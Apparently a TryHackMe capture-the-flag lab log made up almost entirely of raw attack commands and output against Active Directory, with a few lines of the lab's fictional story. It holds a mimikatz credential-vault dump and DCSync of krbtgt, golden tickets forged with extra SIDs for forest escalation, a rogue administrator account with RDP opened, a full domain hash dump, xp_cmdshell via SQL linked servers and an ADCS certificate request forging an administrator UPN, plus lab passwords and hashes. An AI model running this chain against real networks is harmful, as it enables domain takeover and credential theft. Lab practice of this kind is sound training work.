 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

mimikatz(commandline) # vault::cred /patch
TargetName : Domain:batch=TaskScheduler:Task:{2E6C00FF-393D-4763-A043-B6D64E6C9EDB} / <NULL>
UserName   : AI\qw1.brian.singh
Comment    : <NULL>
Type       : 2 - domain_password
Persist    : 2 - local_machine
Flags      : 00004004
Credential : _4v41yVd$!DW
Attributes : 0


mimikatz(commandline) # vault::list

Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
	Name       : Web Credentials
	Path       : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
	Items (0)

Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
	Name       : Windows Credentials
	Path       : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
	Items (1)
	  0.	(null)
		Type            : {3e0e35be-1b77-43e7-b873-aed901b6275b}
		LastWritten     : 11/2/2025 12:02:32 PM
		Flags           : 00004004
		Ressource       : [STRING] Domain:batch=TaskScheduler:Task:{2E6C00FF-393D-4763-A043-B6D64E6C9EDB}
		Identity        : [STRING] AI\qw1.brian.singh
		Authenticator   : 
		PackageSid      : 
		*Authenticator* : [BYTE*] 

		*** Domain Password ***


mimikatz(commandline) # exit
Bye!

sudo evil-winrm -i 127.0.0.1 -u 'qw1.brian.singh' -p '_4v41yVd$!DW'
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---         9/7/2022   3:58 PM                Program Files
d-----        12/2/2025  10:18 AM                Program Files (x86)
d-r---        11/2/2025   4:09 PM                Users
d-----       10/29/2025   6:53 AM                Windows
-a----        11/2/2025   8:17 PM             41 user.txt


*Evil-WinRM* PS C:\> type user.txt
THM{d626aea9-d1ab-4f77-b668-90f221e3dbb6}

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SERVER2$
Domain            : AI
Logon Server      : (null)
Logon Time        : 1/3/2026 1:24:46 AM
SID               : S-1-5-20
	msv :
	 [00000003] Primary
	 * Username : SERVER2$
	 * Domain   : AI
	 * NTLM     : 3752091b637aca354f2b0a9847d964b3
	 * SHA1     : 67745173cffa130f4616e6ddae858021e055d195
	tspkg :
	wdigest :
	 * Username : SERVER2$
	 * Domain   : AI
	 * Password : (null)
	kerberos :
	 * Username : server2$
	 * Domain   : AI.VANCHAT.LOC
	 * Password : 50 4e 53 6e b2 14 c5 41 ca ba 88 f6 95 54 4a 84 f5 e7 05 23 75 57 a3 6c 88 9a 88 6e de e3 74 74 b1 1d 1f e8 6a 39 8c 2e 33 28 ea 61 ac 98 fa 34 a4 45 7b f4 cb e7 28 d3 9a e7 a4 c2 67 02 90 58 10 50 10 89 b7 e0 d1 4f eb 97 fd c2 e9 03 39 73 7c 7d 57 16 19 67 40 8e cb b4 69 c7 40 f0 53 20 e6 bf 79 e2 54 d7 50 0e 49 b1 b6 78 65 7d 2e cf 6b 60 e0 d1 49 e9 01 bc 13 2a 93 86 59 74 81 5d f7 6f 89 9a c7 55 ab 45 67 fd b6 f1 13 53 2b bd 90 23 69 ab 78 67 84 cb 68 e0 33 9a ee be f7 b8 ce a9 a3 7a 3b 07 f7 75 08 f4 3d ca a6 ed 63 f3 39 f9 5b 5c f4 f5 76 7a 58 44 fa 74 0e 21 a0 d0 61 9c cf a7 f8 80 77 6a 6b fc 7c 8a 13 6e 8b 4e 05 ea ae fe 10 92 1a 9a 7d c9 1e 4a ca 4a fd f5 7f e2 60 90 ee 53 79 45 ab e1 3e 22 8e a9 bf 9c
	ssp :
	credman :

 sudo ssh -v -i ~/hopper/db_rsa -D 9050 -L 53:10.200.171.122:53 -L 1053:10.200.171.121:53 -L 389:10.200.171.122:389 -L 88:10.200.171.122:88 -L 445:10.200.171.122:445 -L 5985:10.200.171.101:5985 -L 5986:10.200.171.102:5985 -L 3389:10.200.171.101:3389 scaramouche@10.200.171.11 -N

git clone https://github.com/CravateRouge/bloodyAD.git
cd bloodyAD

proxychains python3 bloodyAD.py \
-d ai.vanchat.loc \
-u 'SERVER2$' \
-p ':3752091b637aca354f2b0a9847d964b3' \
--host 10.200.171.122 \
add groupMember "Domain Admins" "qw1.brian.singh"

*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> type C:\Users\Administrator\root.txt
THM{d93ffd47-5629-4590-8eb3-743404547e04}

Hopper got giddy remembering where the siege on Wareville first began: VanChat. The rush of excitement he felt when LLMs were introduced to the world gave him another attack surface to penetrate—another perimeter to breach…
*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> 

*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
type C:\user.txt 
type C:\Users\Administrator\root.txt 
 
}
THM{1dac8c6b-908e-4100-9deb-f53e68df840d}
THM{c4baffdf-7a8d-44e0-8405-3cb6a2bb91cc}

What was it then? Oh, that’s right. Hopper really put the AD in MAD. Active Directory exploitation was the next breakthrough, bringing King Malhare ever closer to realising his dream.
*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> 

*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> nltest /domain_trusts
List of domain trusts:
    0: VANCHAT vanchat.loc (NT 5) (Forest Tree Root) (Direct Outbound) (Direct Inbound) ( Attr: withinforest )
    1: AI ai.vanchat.loc (NT 5) (Forest: 0) (Primary Domain) (Native)
The command completed successfully

*Evil-WinRM* PS C:\Users\qw1.brian.singh> New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\DC1.ai.vanchat.loc\C$" -Credential $cred

Name           Used (GB)     Free (GB) Provider      Root                                                                                                                                                                                 CurrentLocation
----           ---------     --------- --------      ----                                                                                                                                                                                 ---------------
Z                                      FileSystem    \\DC1.ai.vanchat.loc\C$


*Evil-WinRM* PS C:\Users\qw1.brian.singh> Copy-Item -Path ".\mimikatz.exe" -Destination "Z:\Windows\Temp\mimikatz.exe"

*Evil-WinRM* PS C:\Users\qw1.brian.singh> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock {C:\Windows\Temp\mimikatz.exe "lsadump::dcsync /domain:ai.vanchat.loc /user:AI\krbtgt" "exit"  }

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:ai.vanchat.loc /user:AI\krbtgt
[DC] 'ai.vanchat.loc' will be the domain
[DC] 'DC1.ai.vanchat.loc' will be the DC server
[DC] 'AI\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010202 ( ACCOUNTDISABLE NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/29/2025 8:18:41 AM
Object Security ID   : S-1-5-21-2486023134-1966250817-35160293-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: d816e3b716ded6bc8cfc1feb5d165887
    ntlm- 0: d816e3b716ded6bc8cfc1feb5d165887
    lm  - 0: 901986f0452879701c446c3f91cec032

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : dced536fda01f09b01b28ca2892b7571

* Primary:Kerberos-Newer-Keys *
    Default Salt : AI.VANCHAT.LOCkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : cb01c465fc70ca06856fe0803fb3bd00aff24191f391bc36590233556158ffee
      aes128_hmac       (4096) : 69bc40cf2de61d483d8620a122e096d6
      des_cbc_md5       (4096) : 1c45190b45d07979

* Primary:Kerberos *
    Default Salt : AI.VANCHAT.LOCkrbtgt
    Credentials
      des_cbc_md5       : 1c45190b45d07979

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  9d4dd514cb26359402541a525845b4fd
    02  51364e91df2600a137bdfab5817f2916
    03  3c3bdb2759004c9a64cc74c1c12869d8
    04  9d4dd514cb26359402541a525845b4fd
    05  51364e91df2600a137bdfab5817f2916
    06  bbec3ea0c0724c09cefa9a866adc11cc
    07  9d4dd514cb26359402541a525845b4fd
    08  3c2c0410a6bb041e9acc07ecbdee2c80
    09  3c2c0410a6bb041e9acc07ecbdee2c80
    10  11b3aeab96ed39e287c8dea980a010e5
    11  626a86c28cfd3254858ff2935f436a48
    12  3c2c0410a6bb041e9acc07ecbdee2c80
    13  9ec197694c2575fbb8dd011b74091f06
    14  626a86c28cfd3254858ff2935f436a48
    15  0a1a407e2b6c20d8a0064561ff2fdd47
    16  0a1a407e2b6c20d8a0064561ff2fdd47
    17  e7a3696ede17d0b9892f1db0a806315c
    18  c27f1ec692b776a96321c56b5c52771f
    19  87f86d94b508cd8c21a25d6425271707
    20  e3fc2f61889117e66eb0ae4df71f9a5c
    21  c25945b8d0d04586f0d16f41658d2b9c
    22  c25945b8d0d04586f0d16f41658d2b9c
    23  6d455d1a9cff8c28347116a6ead32045
    24  12336963d85650ad06a4b86c256e4f0a
    25  12336963d85650ad06a4b86c256e4f0a
    26  80f06a85e7c528b9079930081556714d
    27  75a13894cd0426a1e79cb2a82381e2a1
    28  82053084497dbda448d48ae64a490f5f
    29  889a782ee264038273dead10a2c68f62


mimikatz(commandline) # exit
Bye!

*Evil-WinRM* PS C:\Users\qw1.brian.singh> upload PowerView.ps1
                                        
Info: Uploading /home/vector/PowerView.ps1 to C:\Users\qw1.brian.singh\PowerView.ps1
                                        
Data: 1027036 bytes of 1027036 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\qw1.brian.singh> Copy-Item -Path ".\PowerView.ps1" -Destination "Z:\Windows\Temp\PowerView.ps1"

*Evil-WinRM* PS C:\Users\qw1.brian.singh> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
cd C:\Windows\Temp\ 
. .\PowerView.ps1
(Get-ADDomain -Identity vanchat.loc).DomainSID.Value 
}
S-1-5-21-2737471197-2753561878-509622479
*Evil-WinRM* PS C:\Users\qw1.brian.singh> 

*Evil-WinRM* PS C:\Users\qw1.brian.singh> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock {
    C:\Windows\Temp\mimikatz.exe "kerberos::golden /user:Administrator /domain:ai.vanchat.loc /sid:S-1-5-21-2486023134-1966250817-35160293 /krbtgt:d816e3b716ded6bc8cfc1feb5d165887 /sids:S-1-5-21-2737471197-2753561878-509622479-519 /ticket:C:\Windows\Temp\trust.kirbi" "exit"
}

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:ai.vanchat.loc /sid:S-1-5-21-2486023134-1966250817-35160293 /krbtgt:d816e3b716ded6bc8cfc1feb5d165887 /sids:S-1-5-21-2737471197-2753561878-509622479-519 /ticket:C:\Windows\Temp\trust.kirbi
User      : Administrator
Domain    : ai.vanchat.loc (AI)
SID       : S-1-5-21-2486023134-1966250817-35160293
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2737471197-2753561878-509622479-519 ;
ServiceKey: d816e3b716ded6bc8cfc1feb5d165887 - rc4_hmac_nt
Lifetime  : 1/3/2026 8:19:30 AM ; 1/1/2036 8:19:30 AM ; 1/1/2036 8:19:30 AM
-> Ticket : C:\Windows\Temp\trust.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

*Evil-WinRM* PS C:\Users\qw1.brian.singh> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit"
    Get-Content "\\RDC1.vanchat.loc\C$\user.txt"
}

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::ptt C:\Windows\Temp\trust.kirbi

* File: 'C:\Windows\Temp\trust.kirbi': OK

mimikatz(commandline) # exit
Bye!
THM{e36efac9-555b-424a-b44d-8bfd9bc5f660}
*Evil-WinRM* PS C:\Users\qw1.brian.singh> 

*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit"
    Get-Content "\\RDC1.vanchat.loc\C$\Users\Administrator\root.txt"
}

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::ptt C:\Windows\Temp\trust.kirbi

* File: 'C:\Windows\Temp\trust.kirbi': OK

mimikatz(commandline) # exit
Bye!
THM{cf66a7ad-6b5f-4e48-be3a-a39881f537c1}

"No Domain, No Gain" - that’s what Hopper always said. Well, at least that’s what he said on that particular day during what is now known in HopSec cyber circles as “The Great Wareville Breach.”
"But we’ve already breached a domain?" asked the King.
"Not them all. Not yet," Hopper laughed.
*Evil-WinRM* PS C:\Users\qw1.brian.singh\Documents> 

#Create a user on RDC1 
Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
    # HOP 1: Load on DC1
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit";
    
    Invoke-Command -ComputerName RDC1.vanchat.loc -ScriptBlock { 
        # 1. Create the local user 'AGI'
        net user AGI P@ssword123! /add
        
        # 2. Add 'AGI' to Local Administrators
        net localgroup Administrators AGI /add
        
        # 3. Add 'AGI' to Remote Desktop Users
        net localgroup "Remote Desktop Users" AGI /add
        
        # 4. Ensure RDP is actually turned on
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
        
        # 5. Open the firewall for RDP
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        
        Write-Host "--- User 'AGI' is ready for RDP on RDC1 ---" -ForegroundColor Green
    }
}

Output:
The command completed successfully.

The command completed successfully.

The command completed successfully.

--- User 'AGI' is ready for RDP on RDC1 ---

#Add AGI to Domain Admin for RDC1
Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock { 
    # HOP 1: Load ticket on DC1
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit";
    
    Invoke-Command -ComputerName RDC1.vanchat.loc -ScriptBlock { 
        # HOP 2: Load ticket on RDC1 (Nesting Rule!)
        C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit";
        
        # Force the Domain Controller to add AGI to Domain Admins via RDC1's context
        net group "Domain Admins" AGI /add /domain
                
        # Immediate verification from RDC1's perspective
        net group "Domain Admins" /domain
    }
}

Members

-------------------------------------------------------------------------------
Administrator            AGI
The command completed successfully.

#Add AGI to Enterprise Admin 
Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock {
    # 1. Generate the Golden Ticket locally on DC1
    C:\Windows\Temp\mimikatz.exe "kerberos::golden /user:AGI /domain:ai.vanchat.loc /sid:S-1-5-21-2486023134-1966250817-35160293 /krbtgt:d816e3b716ded6bc8cfc1feb5d165887 /sids:S-1-5-21-2737471197-2753561878-509622479-519 /ticket:C:\Windows\Temp\AGI.kirbi" "exit";
    
    # 2. Load the trust ticket so DC1 can talk to RDC1
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit";
    
    # 3. Copy your "Skeleton Key" (Golden Ticket) over to RDC1
    copy C:\Windows\Temp\AGI.kirbi \\RDC1.vanchat.loc\C$\Windows\Temp\AGI.kirbi;

    # 4. NEST the command to run ON RDC1
    Invoke-Command -ComputerName RDC1.vanchat.loc -ScriptBlock {
        # 5. LOAD THE GOLDEN TICKET ON RDC1 (Crucial!)
        C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\AGI.kirbi" "exit";
        
        # 6. NOW perform the permanent group addition
        net group "Enterprise Admins" AGI /add /domain
        
    
    }
}

*Evil-WinRM* PS C:\Users\qw1.brian.singh> Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock {
    # Load your ticket first!
    C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit"
    C:\Windows\Temp\mimikatz.exe "lsadump::dcsync /domain:vanchat.loc /all /csv" "exit"
}

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::ptt C:\Windows\Temp\trust.kirbi

* File: 'C:\Windows\Temp\trust.kirbi': OK

mimikatz(commandline) # exit
Bye!

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:vanchat.loc /all /csv
[DC] 'vanchat.loc' will be the domain
[DC] 'RDC1.vanchat.loc' will be the DC server
[DC] Exporting domain 'vanchat.loc'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1008	THMSetup	c1a2871e90759bbbf4311045a7e5fa6a	66048
502	krbtgt	8b4b13adbfd5bdc9d4fd7db1a97eaef3	514
1118	qw1.paul.walters	ce3fba01bc3569d8898f3b28e95084a0	66048
1119	qw1.paul.kelly	c506bb828d7e08f59b6753e715fa9728	66048
1121	qw1.rachael.king	82d94f76c85f0139f15d3ba596844f77	66048
1123	qw1.ryan.hughes	f7f9820d82c706c7cac431b13366cb38	66048
1125	qw1.abdul.campbell	5d95c8f36ddb8bd10773d8456bd96ef0	66048
1126	qw1.victor.smith	f89a50cf385fdd303d529aedd9637201	66048
1128	qw1.lorraine.walters	e8edb601b4cce9bef79fb209301f2b0e	66048
1129	qw1.geraldine.hall	35497e719deb66383a2b65a2f7cd90e4	66048
1130	qw1.grace.hall	0c8f43f0e82279bfc50c3af006054ff7	66048
1124	qw1.geoffrey.bailey	4149096e6a9767d2859a3c470f6da854	66048
500	Administrator	c1a2871e90759bbbf4311045a7e5fa6a	66048
1122	qw1.owen.khan	3da2862b35cb78c54a5e0e79d6a099e1	66048
1127	qw0.victor.smith	3e472edcbf7f931816004e56208714c1	66048
1120	qw0.paul.kelly	0676d142573b2d9f0aab223e8e002b78	66048
1131	qw0.grace.hall	cd042e89eb705d9b0863ba07c117bb8f	66048
1009	RDC1$	646f8ac6f6e47ff46c0511f2cee42d3c	532480
1133	SERVER3$	7cd9bec35ca98f454455654b9bc987bf	4096
1132	AI$	978132532836f32e66424b081937ce49	2080
1117	qw1.martyn.jones	2b576acbe6bcfda7294d6bd18041b8fe	66048

mimikatz(commandline) # exit
Bye!

#RDP as Brian on Server 2
xfreerdp3 /v:127.0.0.1:3390 /u:'qw1.brian.singh' /p:'_4v41yVd$!DW' /cert:ignore +clipboard /dynamic-resolution

PS C:\Users\qw1.brian.singh> mstsc /v:10.200.171.122

PS C:\Windows\system32> net user qw1.martyn.jones Password123! /domain
The command completed successfully.

PS C:\Windows\system32> mstsc /v:10.200.171.103

PS C:\> hostname
Server3
PS C:\> cat user.txt
THM{a89e2667-f920-4c10-99ec-3ed33a7cf1b9}
PS C:\> cat /Users/Administrator\root.txt
THM{4fc264ab-8449-4039-a22d-25ee7d15626e}
PS C:\>

PS C:\> sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''nltest /dclist:tbfc.loc''') AT [TBFC_LS]"
output                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Get list of DCs in domain 'tbfc.loc' from '\\TBFC-DC1.tbfc.loc'.                                                                                                                                                                                
    TBFC-DC1.tbfc.loc [PDC]  [DS] Site: Default-First-Site-Name                                                                                                                                                                                 
The command completed successfully                                                                                                                                                                                                              
NULL                                                                                                                                                                                                                                            

(4 rows affected)
PS C:\> sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''ping -n 1 TBFC-DC1.tbfc.loc''') AT [TBFC_LS]"
output                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
NULL                                                                                                                                                                                                                                            
Pinging TBFC-DC1.tbfc.loc [10.200.171.131] with 32 bytes of data:                                                                                                                                                                               
Reply from 10.200.171.131: bytes=32 time<1ms TTL=128                                                                                                                                                                                            
NULL                                                                                                                                                                                                                                            
Ping statistics for 10.200.171.131:                                                                                                                                                                                                             
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),                                                                                                                                                                                        
Approximate round trip times in milli-seconds:                                                                                                                                                                                                  
    Minimum = 0ms, Maximum = 0ms, Average = 0ms                                                                                                                                                                                                 
NULL                                                                                                                                                                                                                                            

(9 rows affected)
PS C:\>

PS C:\> cd Users
PS C:\Users> dir .\qw1.owen.khan\Documents\


    Directory: C:\Users\qw1.owen.khan\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/30/2025  10:31 PM                SQL Server Management Studio
d-----       10/30/2025  10:32 PM                SQL Server Management Studio 21
d-----         9/7/2022   3:57 PM                WindowsPowerShell


PS C:\Users>

PS C:\Users> Get-Service | Where-Object {$_.Name -like "*SQL*"}

Status   Name               DisplayName
------   ----               -----------
Running  MSSQLSERVER        SQL Server (MSSQLSERVER)
Stopped  SQLBrowser         SQL Server Browser
Running  SQLSERVERAGENT     SQL Server Agent (MSSQLSERVER)
Running  SQLTELEMETRY       SQL Server CEIP service (MSSQLSERVER)
Running  SQLWriter          SQL Server VSS Writer

$SQLQuery = "SELECT name, product, provider, data_source FROM sys.servers"
$ConnectionString = "Server=.;Database=master;Trusted_Connection=True;"
$Array = New-Object System.Collections.ArrayList
$Connection = New-Object System.Data.SqlClient.SqlConnection($ConnectionString)
$Command = New-Object System.Data.SqlClient.SqlCommand($SQLQuery, $Connection)
$Connection.Open()
$Adapter = New-Object System.Data.SqlClient.SqlDataAdapter($Command)
$DataSet = New-Object System.Data.DataSet
$Adapter.Fill($DataSet) | Out-Null
$Connection.Close()
$DataSet.Tables[0] | Format-Table -AutoSize

name    product    provider   data_source
----    -------    --------   -----------
SERVER3 SQL Server SQLNCLI    SERVER3
TBFC_LS            MSOLEDBSQL TBFC-SQLServer1.tbfc.loc

PS C:\Users> sqlcmd -S . -E -Q "SELECT name, is_rpc_out_enabled FROM sys.servers WHERE name = 'TBFC_LS'"
name                                                                                                                             is_rpc_out_enabled
-------------------------------------------------------------------------------------------------------------------------------- ------------------
TBFC_LS                                                                                                                                           1

PS C:\Users> sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''whoami''') AT [TBFC_LS]"
output                                                                                                                                                                                                                           
tbfc\jack.garner                                                                                                                                       
NULL                                                                                                                                                                                                                              

PS C:\Users> sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''type C:\user.txt''') AT [TBFC_LS]"
                                                                                                                                                                                                                                          
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
THM{b792725b-604a-416d-9cbb-fe70d4def322}                                                                                                                                                                                                       

(1 rows affected)
PS C:\Users> sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''type C:\Users\Administrator\root.txt''') AT [TBFC_LS]"
                                                                                                                                                            
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
THM{c58b7654-321a-4872-9645-d28097dcc9da}                                                                                                                                                                                                       
NULL                                                                                                                                                                                                                                            
King Malhare couldnÆt sleep from excitement; the groundwork for the siege of Wareville had almost been completed.                                                                                                                               
 "Are weà are we in, Hopper?" quivered the King.                                                                                                                                                                                                
 "Almost. One hurdle left to clear," Hopper smirked.                                                                                                                                                                                            
 "Can you do it?! The best festival company is notoriously hard to breach!" the King cried, clutching Hopper by the collar.                                                                                                                     
 "Well, IÆm cooking up a supply chain attack that says otherwise," Hopper replied, as both he and the King burst into a fit of evil (depending on your moral compass) laughter.                                                                 
NULL                                                                                                                                                                                                                                            
NULL                                                                                                                                                                                                                                            

(9 rows affected)
PS C:\Users>

sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''net user AGI P@ssword123! /add''') AT [TBFC_LS]"
output                                                                                                                                                                                                                                          

The command completed successfully.  


 sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''net localgroup Administrators AGI /add''') AT [TBFC_LS]"
output                                                                                                                                                                                                                                          

The command completed successfully.


sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''netstat -an | findstr :3389''') AT [TBFC_LS]"
output                                                                                                                                                                                                                                          

  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING                                                                                                                                                                                
  TCP    [::]:3389              [::]:0                 LISTENING                                                                                                                                                                                
  UDP    0.0.0.0:3389           *:*                                                                                                                                                                                                             
  UDP    [::]:3389              *:*  

sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''certutil -ADCA''') AT [TBFC_LS]"**
Purpose: Enumerate all Certificate Authorities in the Active Directory environment

Key Findings:
CA Name: TBFC-CA
Host: TBFC-DC1.tbfc.loc (runs on the Domain Controller)
Certificate Validity: 10/28/2025 - 10/28/2045 (20-year validity)
CA Type: Advanced CA with NT Authentication support

Available Templates: 12 total
TBFCWebServer (custom)
Administrator
User
Machine
WebServer
DomainController
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery, EFS
SubCA

Permissions:
Authenticated Users: Allow Enroll, Allow Read
Enterprise Admins: Allow Full Control
Domain Admins: Allow Full Control
TBFC-DC1$ (DC machine account): Allow Full Control

sqlcmd -S . -E -Q "EXEC('xp_cmdshell ''certutil -v -Template Administrator''') AT [TBFC_LS]"

#Win-RM on Server 2
evil-winrm -i 127.0.0.1 -P 5986 -u 'qw1.brian.singh' -p '_4v41yVd$!DW'

#Upload PsExec.exe 
upload PsExec.exe 

#Nested Commands to transfer PsExec.exe -> DC1 -> RDC1
Copy-Item -Path ".\PsExec.exe" -Destination "Z:\Windows\Temp\PsExec.exe"

#Copy mimikatz.exe to RDC1
Invoke-Command -ComputerName DC1.ai.vanchat.loc -Credential $cred -ScriptBlock {
 C:\Windows\Temp\mimikatz.exe "kerberos::ptt C:\Windows\Temp\trust.kirbi" "exit"; copy C:\Windows\Temp\PsExec.exe \\RDC1.vanchat.loc\C$\Windows\Temp\PsExec.exe}

.\PsExec.exe -accepteula -i -s powershell.exe

$inf = @"
[Version]
Signature="`$Windows NT`$"

[NewRequest]
Subject = "CN=fakeuser"
KeyLength = 2048
Exportable = TRUE
MachineKeySet = TRUE
ProviderName = "Microsoft RSA SChannel Cryptographic Provider"

[Extensions]
2.5.29.17 = "{text}upn=administrator@tbfc.loc"

[RequestAttributes]
CertificateTemplate = TBFCWebServer
"@

$inf | Out-File -FilePath "C:\Windows\Temp\request.inf" -Encoding ASCII

certreq -f -new C:\Windows\Temp\request.inf C:\Windows\Temp\request.req
Active Directory Enrollment Policy
  {6512349B-6E00-4251-9DE1-D6A8CD9E8D13}
  ldap:

CertReq: Request Created 

